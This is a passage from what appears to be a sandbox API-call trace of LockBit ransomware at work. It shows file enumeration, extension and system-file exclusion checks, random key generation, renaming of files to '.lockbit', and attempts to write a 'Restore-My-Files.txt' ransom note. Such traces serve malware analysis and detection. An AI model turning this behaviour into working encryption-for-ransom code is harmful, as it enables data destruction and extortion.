[0176.211] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01236_.WMF") returned -1 [0176.212] lstrcmpiW (lpString1="ntldr", lpString2="SO01236_.WMF") returned -1 [0176.212] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01236_.WMF") returned -1 [0176.212] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01236_.WMF") returned -1 [0176.212] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01236_.WMF") returned -1 [0176.212] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01236_.WMF") returned 1 [0176.212] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01236_.WMF") returned -1 [0176.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.212] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF") returned=".WMF" [0176.212] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.212] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.212] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.213] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.214] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.214] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF.lockbit") returned 72 [0176.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01236_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.237] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.237] malloc (_Size=0x40068) returned 0x3d70450 [0176.237] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=67422) returned 1 [0176.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.238] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.241] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.241] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.243] free (_Block=0x1fa2ed8) [0176.243] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.243] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.244] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e49c00, ftCreationTime.dwHighDateTime=0x1bd4b13, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8e49c00, ftLastWriteTime.dwHighDateTime=0x1bd4b13, nFileSizeHigh=0x0, nFileSizeLow=0x43b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01560_.WMF", cAlternateFileName="")) returned 1 [0176.244] lstrcmpiW (lpString1=".", lpString2="SO01560_.WMF") returned -1 [0176.244] lstrcmpiW (lpString1="..", lpString2="SO01560_.WMF") returned -1 [0176.244] PathFindExtensionW (pszPath="SO01560_.WMF") returned=".WMF" [0176.244] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.244] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.245] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.245] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01560_.WMF") returned -1 [0176.246] lstrcmpiW (lpString1="ntldr", lpString2="SO01560_.WMF") returned -1 [0176.246] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01560_.WMF") returned -1 [0176.246] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01560_.WMF") returned -1 [0176.246] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01560_.WMF") returned -1 [0176.246] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01560_.WMF") returned 1 [0176.246] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01560_.WMF") returned -1 [0176.246] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.246] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF") returned=".WMF" [0176.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.246] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.246] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.247] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.248] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.248] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF.lockbit") returned 72 [0176.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01560_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0176.250] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.250] malloc (_Size=0x40068) returned 0x3e70008 [0176.250] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=17328) returned 1 [0176.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0176.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0176.251] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0176.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.256] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.256] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.258] free (_Block=0x1fa2ed8) [0176.258] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.258] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.258] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.258] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b10300, ftCreationTime.dwHighDateTime=0x1bd4af7, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc2b10300, ftLastWriteTime.dwHighDateTime=0x1bd4af7, nFileSizeHigh=0x0, nFileSizeLow=0x59d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01561_.WMF", cAlternateFileName="")) returned 1 [0176.258] lstrcmpiW (lpString1=".", lpString2="SO01561_.WMF") returned -1 [0176.258] lstrcmpiW (lpString1="..", lpString2="SO01561_.WMF") returned -1 [0176.258] PathFindExtensionW (pszPath="SO01561_.WMF") returned=".WMF" [0176.258] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.258] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.259] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.260] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.261] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.261] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01561_.WMF") returned -1 [0176.262] lstrcmpiW (lpString1="ntldr", lpString2="SO01561_.WMF") returned -1 [0176.262] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01561_.WMF") returned -1 [0176.262] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01561_.WMF") returned -1 [0176.262] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01561_.WMF") returned -1 [0176.262] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01561_.WMF") returned 1 [0176.262] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01561_.WMF") returned -1 [0176.262] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.262] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF") returned=".WMF" [0176.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.262] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.262] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.263] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.264] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF.lockbit") returned 72 [0176.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01561_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.265] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.265] malloc (_Size=0x40068) returned 0x3df0008 [0176.265] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23000) returned 1 [0176.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.267] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.279] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF.lockbit", 